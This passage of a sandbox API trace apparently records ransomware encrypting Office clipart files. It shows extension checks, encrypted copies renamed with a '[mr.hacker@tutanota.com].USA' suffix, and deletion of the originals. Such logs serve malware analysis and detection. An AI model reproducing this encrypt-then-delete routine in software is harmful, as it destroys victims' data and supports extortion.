lpString2="_.WMF") returned -1 [0269.935] lstrlenW (lpString=".pdf") returned 4 [0269.935] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString=".xls") returned 4 [0269.935] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.935] lstrlenW (lpString=".xlsx") returned 5 [0269.935] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.935] lstrlenW (lpString=".ppt") returned 4 [0269.935] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.935] lstrlenW (lpString=".zip") returned 4 [0269.935] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.935] lstrlenW (lpString=".rar") returned 4 [0269.935] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString=".bz2") returned 4 [0269.935] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.936] lstrlenW (lpString=".7z") returned 3 [0269.936] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.936] lstrlenW (lpString=".dbf") returned 4 [0269.936] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.936] lstrlenW (lpString=".1cd") returned 4 [0269.936] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.936] lstrlenW (lpString=".jpg") returned 4 [0269.936] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.936] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.936] lstrlenW (lpString="DD01173_.WMF") returned 12 [0269.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0270.139] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1804) returned 1 [0270.140] CloseHandle (hObject=0x3ac) returned 1 [0270.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 0x20 [0270.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.153] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.153] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.153] GetLastError () returned 0x0 [0270.153] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x70c, lpOverlapped=0x0) returned 1 [0270.169] WriteFile (in: hFile=0x380, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x710, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.170] WriteFile (in: hFile=0x380, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.170] SetEndOfFile (hFile=0x380) returned 1 [0270.183] CloseHandle (hObject=0x380) returned 1 [0270.183] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.183] SetEndOfFile (hFile=0x3a4) returned 1 [0270.389] CloseHandle (hObject=0x3a4) returned 1 [0270.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 1 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.770] lstrlenW (lpString=".doc") returned 4 [0270.770] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString=".docx") returned 5 [0270.770] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.770] lstrlenW (lpString=".pdf") returned 4 [0270.770] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString=".xls") returned 4 [0270.770] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.771] lstrlenW (lpString=".xlsx") returned 5 [0270.771] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.771] lstrlenW (lpString=".ppt") returned 4 [0270.771] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString=".zip") returned 4 [0270.771] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.771] lstrlenW (lpString=".rar") returned 4 [0270.771] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString=".bz2") returned 4 [0270.771] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString=".7z") returned 3 [0270.771] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString=".dbf") returned 4 [0270.771] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString=".1cd") returned 4 [0270.771] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString=".jpg") returned 4 [0270.771] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.771] lstrlenW (lpString=".doc") returned 4 [0270.771] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString=".docx") returned 5 [0270.771] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.771] lstrlenW (lpString=".pdf") returned 4 [0270.772] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".xls") returned 4 [0270.772] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.772] lstrlenW (lpString=".xlsx") returned 5 [0270.772] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.772] lstrlenW (lpString=".ppt") returned 4 [0270.772] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.772] lstrlenW (lpString=".zip") returned 4 [0270.772] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.772] lstrlenW (lpString=".rar") returned 4 [0270.772] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".bz2") returned 4 [0270.772] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".7z") returned 3 [0270.772] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.772] lstrlenW (lpString=".dbf") returned 4 [0270.772] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.772] lstrlenW (lpString=".1cd") returned 4 [0270.772] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63 [0270.772] lstrlenW (lpString=".jpg") returned 4 [0270.772] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.772] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.773] lstrlenW (lpString="ED00010_.WMF") returned 12 [0270.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.773] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1382) returned 1 [0270.773] CloseHandle (hObject=0x3a4) returned 1 [0270.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 0x20 [0270.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.773] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.773] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.774] GetLastError () returned 0x0 [0270.774] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x566, lpOverlapped=0x0) returned 1 [0270.782] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x570, lpOverlapped=0x0) returned 1 [0270.782] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.782] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.783] SetEndOfFile (hFile=0x348) returned 1 [0270.783] CloseHandle (hObject=0x348) returned 1 [0270.783] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.783] SetEndOfFile (hFile=0x3a4) returned 1 [0270.786] CloseHandle (hObject=0x3a4) returned 1 [0270.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.825] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 1 [0270.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.825] lstrlenW (lpString=".doc") returned 4 [0270.825] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.825] lstrlenW (lpString=".docx") returned 5 [0270.825] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.826] lstrlenW (lpString=".pdf") returned 4 [0270.826] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString=".xls") returned 4 [0270.826] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.826] lstrlenW (lpString=".xlsx") returned 5 [0270.826] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.826] lstrlenW (lpString=".ppt") returned 4 [0270.826] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.826] lstrlenW (lpString=".zip") returned 4 [0270.826] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.826] lstrlenW (lpString=".rar") returned 4 [0270.826] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString=".bz2") returned 4 [0270.826] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString=".7z") returned 3 [0270.826] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.826] lstrlenW (lpString=".dbf") returned 4 [0270.826] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.826] lstrlenW (lpString=".1cd") returned 4 [0270.826] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.826] lstrlenW (lpString=".jpg") returned 4 [0270.826] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString=".doc") returned 4 [0270.827] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString=".docx") returned 5 [0270.827] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.827] lstrlenW (lpString=".pdf") returned 4 [0270.827] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString=".xls") returned 4 [0270.827] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.827] lstrlenW (lpString=".xlsx") returned 5 [0270.827] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.827] lstrlenW (lpString=".ppt") returned 4 [0270.827] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString=".zip") returned 4 [0270.827] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.827] lstrlenW (lpString=".rar") returned 4 [0270.827] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString=".bz2") returned 4 [0270.827] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString=".7z") returned 3 [0270.827] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString=".dbf") returned 4 [0270.827] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString=".1cd") returned 4 [0270.827] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0270.827] lstrlenW (lpString=".jpg") returned 4 [0270.828] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.828] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.828] lstrlenW (lpString="ED00184_.WMF") returned 12 [0270.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.829] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=6958) returned 1 [0270.829] CloseHandle (hObject=0x3b0) returned 1 [0270.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf")) returned 0x20 [0270.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.830] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.830] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.830] GetLastError () returned 0x0 [0270.830] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1b2e, lpOverlapped=0x0) returned 1 [0270.859] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1b30, lpOverlapped=0x0) returned 1 [0270.860] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.860] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.861] SetEndOfFile (hFile=0x388) returned 1 [0270.861] CloseHandle (hObject=0x388) returned 1 [0270.861] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.861] SetEndOfFile (hFile=0x3b0) returned 1 [0270.863] CloseHandle (hObject=0x3b0) returned 1 [0270.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf")) returned 1 [0270.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.931] lstrlenW (lpString=".doc") returned 4 [0270.931] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.931] lstrlenW (lpString=".docx") returned 5 [0270.932] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.932] lstrlenW (lpString=".pdf") returned 4 [0270.932] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString=".xls") returned 4 [0270.932] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.932] lstrlenW (lpString=".xlsx") returned 5 [0270.932] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.932] lstrlenW (lpString=".ppt") returned 4 [0270.932] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.932] lstrlenW (lpString=".zip") returned 4 [0270.932] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.932] lstrlenW (lpString=".rar") returned 4 [0270.932] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString=".bz2") returned 4 [0270.932] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString=".7z") returned 3 [0270.932] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.932] lstrlenW (lpString=".dbf") returned 4 [0270.932] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.932] lstrlenW (lpString=".1cd") returned 4 [0270.932] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.932] lstrlenW (lpString=".jpg") returned 4 [0270.932] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.933] lstrlenW (lpString=".doc") returned 4 [0270.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.933] lstrlenW (lpString=".docx") returned 5 [0270.933] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.933] lstrlenW (lpString=".pdf") returned 4 [0270.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.933] lstrlenW (lpString=".xls") returned 4 [0270.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.933] lstrlenW (lpString=".xlsx") returned 5 [0270.933] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.933] lstrlenW (lpString=".ppt") returned 4 [0270.933] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63 [0270.933] 